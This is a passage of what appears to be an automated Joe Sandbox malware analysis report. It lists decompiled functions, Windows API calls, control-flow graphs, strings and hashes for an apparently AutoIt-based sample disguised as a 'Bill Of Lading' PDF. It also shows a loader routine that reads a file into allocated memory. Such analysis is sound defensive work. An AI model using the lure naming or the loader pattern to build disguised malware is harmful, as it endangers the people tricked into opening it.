                                                                                                                      • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                      • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                      • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                                                                      Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                      • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                      • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                      • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                      • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                        • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                        • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                        • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                        • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                        • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                        • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                        • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00A50870,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                      • String ID: #$0$PGH
                                                                                                                      • API String ID: 423443420-3673556320
                                                                                                                      • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                      • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                      • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                      • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                                                                                                                      Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • _fseek.LIBCMT ref: 004525DA
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                        • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                        • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452618
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452629
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452644
                                                                                                                      • __fread_nolock.LIBCMT ref: 00452661
                                                                                                                      • _fseek.LIBCMT ref: 0045267D
                                                                                                                      • _malloc.LIBCMT ref: 00452689
                                                                                                                      • _malloc.LIBCMT ref: 00452696
                                                                                                                      • __fread_nolock.LIBCMT ref: 004526A7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1911931848-0
                                                                                                                      • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                      • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                                                      • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                      • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A
                                                                                                                      Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 290 40f450-40f45c call 425210 293 40f460-40f478 290->293 293->293 294 40f47a-40f4a8 call 413990 call 410f70 293->294 299 40f4b0-40f4d1 call 4151b0 294->299 302 40f531 299->302 303 40f4d3-40f4da 299->303 306 40f536-40f540 302->306 304 40f4dc-40f4de 303->304 305 40f4fd-40f517 call 41557c 303->305 307 40f4e0-40f4e2 304->307 310 40f51c-40f51f 305->310 309 40f4e6-40f4ed 307->309 311 40f521-40f52c 309->311 312 40f4ef-40f4f2 309->312 310->299 315 40f543-40f54e 311->315 316 40f52e-40f52f 311->316 313 42937a-4293a0 call 41557c call 4151b0 312->313 314 40f4f8-40f4fb 312->314 327 4293a5-4293c3 call 4151d0 313->327 314->305 314->307 318 40f550-40f553 315->318 319 40f555-40f560 315->319 316->312 318->312 320 429372 319->320 321 40f566-40f571 319->321 320->313 323 429361-429367 321->323 324 40f577-40f57a 321->324 323->309 326 42936d 323->326 324->312 326->320 327->306
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock_fseek_strcat
                                                                                                                      • String ID: AU3!$EA06
                                                                                                                      • API String ID: 3818483258-2658333250
                                                                                                                      • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                      • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                                                      • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                      • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
                                                                                                                      Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 330 410130-410142 SHGetMalloc 331 410148-410158 SHGetDesktopFolder 330->331 332 42944f-429459 call 411691 330->332 333 4101d1-4101e0 331->333 334 41015a-410188 call 411691 331->334 333->332 340 4101e6-4101ee 333->340 342 4101c5-4101ce 334->342 343 41018a-4101a1 SHGetPathFromIDListW 334->343 342->333 344 4101a3-4101b1 call 411691 343->344 345 4101b4-4101c0 343->345 344->345 345->342
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                                                      • String ID: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe
                                                                                                                      • API String ID: 192938534-971228906
                                                                                                                      • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                      • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                                                      • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                      • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                                                                                                                      Function 04022A18 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 348 4022a18-4022ac6 call 4020408 351 4022acd-4022af3 call 4023928 CreateFileW 348->351 354 4022af5 351->354 355 4022afa-4022b0a 351->355 356 4022c45-4022c49 354->356 363 4022b11-4022b2b VirtualAlloc 355->363 364 4022b0c 355->364 357 4022c8b-4022c8e 356->357 358 4022c4b-4022c4f 356->358 360 4022c91-4022c98 357->360 361 4022c51-4022c54 358->361 362 4022c5b-4022c5f 358->362 367 4022c9a-4022ca5 360->367 368 4022ced-4022d02 360->368 361->362 369 4022c61-4022c6b 362->369 370 4022c6f-4022c73 362->370 365 4022b32-4022b49 ReadFile 363->365 366 4022b2d 363->366 364->356 371 4022b50-4022b90 VirtualAlloc 365->371 372 4022b4b 365->372 366->356 373 4022ca7 367->373 374 4022ca9-4022cb5 367->374 375 4022d12-4022d1a 368->375 376 4022d04-4022d0f VirtualFree 368->376 369->370 377 4022c83 370->377 378 4022c75-4022c7f 370->378 379 4022b92 371->379 380 4022b97-4022bb2 call 4023b78 371->380 372->356 373->368 381 4022cb7-4022cc7 374->381 382 4022cc9-4022cd5 374->382 376->375 377->357 378->377 379->356 388 4022bbd-4022bc7 380->388 384 4022ceb 381->384 385 4022ce2-4022ce8 382->385 386 4022cd7-4022ce0 382->386 384->360 385->384 386->384 389 4022bfa-4022c0e call 4023988 388->389 390 4022bc9-4022bf8 call 4023b78 388->390 395 4022c12-4022c16 389->395 396 4022c10 389->396 390->388 398 4022c22-4022c26 395->398 399 4022c18-4022c1c CloseHandle 395->399 396->356 400 4022c36-4022c3f 398->400 401 4022c28-4022c33 VirtualFree 398->401 399->398 400->351 400->356 401->400
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04022AE9
                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04022D0F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 204039940-0
                                                                                                                      • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                      • Instruction ID: c1e00cb504eaa307ea311cfdc18a0d6ab4d4f69dbc46d1e4a41e65e631715753
                                                                                                                      • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                      • Instruction Fuzzy Hash: F7A11774E00219EBDB14CFE4CA94BEEBBB5BF48304F208599E501BB2C0D775AA81DB55
                                                                                                                      Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 402 414f10-414f2c 403 414f4f 402->403 404 414f2e-414f31 402->404 406 414f51-414f55 403->406 404->403 405 414f33-414f35 404->405 407 414f37-414f46 call 417f23 405->407 408 414f56-414f5b 405->408 420 414f47-414f4c call 417ebb 407->420 409 414f6a-414f6d 408->409 410 414f5d-414f68 408->410 413 414f7a-414f7c 409->413 414 414f6f-414f77 call 4131f0 409->414 410->409 412 414f8b-414f9e 410->412 418 414fa0-414fa6 412->418 419 414fa8 412->419 413->407 417 414f7e-414f89 413->417 414->413 417->407 417->412 422 414faf-414fb1 418->422 419->422 420->403 424 4150a1-4150a4 422->424 425 414fb7-414fbe 422->425 424->406 427 414fc0-414fc5 425->427 428 415004-415007 425->428 427->428 431 414fc7 427->431 429 415071-415072 call 41e6b1 428->429 430 415009-41500d 428->430 437 415077-41507b 429->437 433 41500f-415018 430->433 434 41502e-415035 430->434 435 415102 431->435 436 414fcd-414fd1 431->436 438 415023-415028 433->438 439 41501a-415021 433->439 441 415037 434->441 442 415039-41503c 434->442 440 415106-41510f 435->440 443 414fd3 436->443 444 414fd5-414fd8 436->444 437->440 447 415081-415085 437->447 448 41502a-41502c 438->448 439->448 440->406 441->442 449 415042-41504e call 41453a call 41ed9e 442->449 450 4150d5-4150d9 442->450 443->444 445 4150a9-4150af 444->445 446 414fde-414fff call 41ee9b 444->446 455 4150b1-4150bd call 4131f0 445->455 456 4150c0-4150d0 call 417f23 445->456 462 415099-41509b 446->462 447->450 454 415087-415096 447->454 448->442 470 415053-415058 449->470 452 4150eb-4150fd call 417f23 450->452 453 4150db-4150e8 call 4131f0 450->453 452->420 453->452 454->462 455->456 456->420 462->424 462->425 471 415114-415118 470->471 472 41505e-415061 470->472 471->440 472->435 473 415067-41506f 472->473 473->462
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3886058894-0
                                                                                                                      • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                      • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                                                      • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                      • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99
                                                                                                                      Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • _memset.LIBCMT ref: 00401C62
                                                                                                                      • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                      • _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                                      • String ID: Line:
                                                                                                                      • API String ID: 1620655955-1585850449
                                                                                                                      • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                      • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                      • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                      • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                                                      Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 507 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                      • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                      • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                      • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                      • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                                                                      Function 040227B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 508 40227b8-402290e call 4020408 call 40226a8 CreateFileW 515 4022910 508->515 516 4022915-4022925 508->516 517 40229c5-40229ca 515->517 519 4022927 516->519 520 402292c-4022946 VirtualAlloc 516->520 519->517 521 402294a-4022961 ReadFile 520->521 522 4022948 520->522 523 4022963 521->523 524 4022965-402299f call 40226e8 call 40216a8 521->524 522->517 523->517 529 40229a1-40229b6 call 4022738 524->529 530 40229bb-40229c3 ExitProcess 524->530 529->530 530->517
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 040226A8: Sleep.KERNELBASE(000001F4), ref: 040226B9
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04022904
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileSleep
                                                                                                                      • String ID: YCC24SNUFIFGMYGL29YL5GKXLMBKJ
                                                                                                                      • API String ID: 2694422964-76732643
                                                                                                                      • Opcode ID: 0f12f549611eb9110984487352bf2c0f6f0a20de29ebe12cc5b18359a63a1617
                                                                                                                      • Instruction ID: 99203af3cd0c8cd736c121d498f9fa5bbb87fa1a1dc180af2649d0bb9a96b34b
                                                                                                                      • Opcode Fuzzy Hash: 0f12f549611eb9110984487352bf2c0f6f0a20de29ebe12cc5b18359a63a1617
                                                                                                                      • Instruction Fuzzy Hash: 8C618470D08298DAEF11DBF4D848BEEBBB5AF19304F044199E2487B2C1D7B91B45CB66
                                                                                                                      Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 00413AA6
                                                                                                                        • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                                        • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                                                        • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                      • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                      • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                                      • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                      • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                                      Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                                                        • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                                                        • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                                                      • _strcat.LIBCMT ref: 0040F603
                                                                                                                        • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                                                        • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
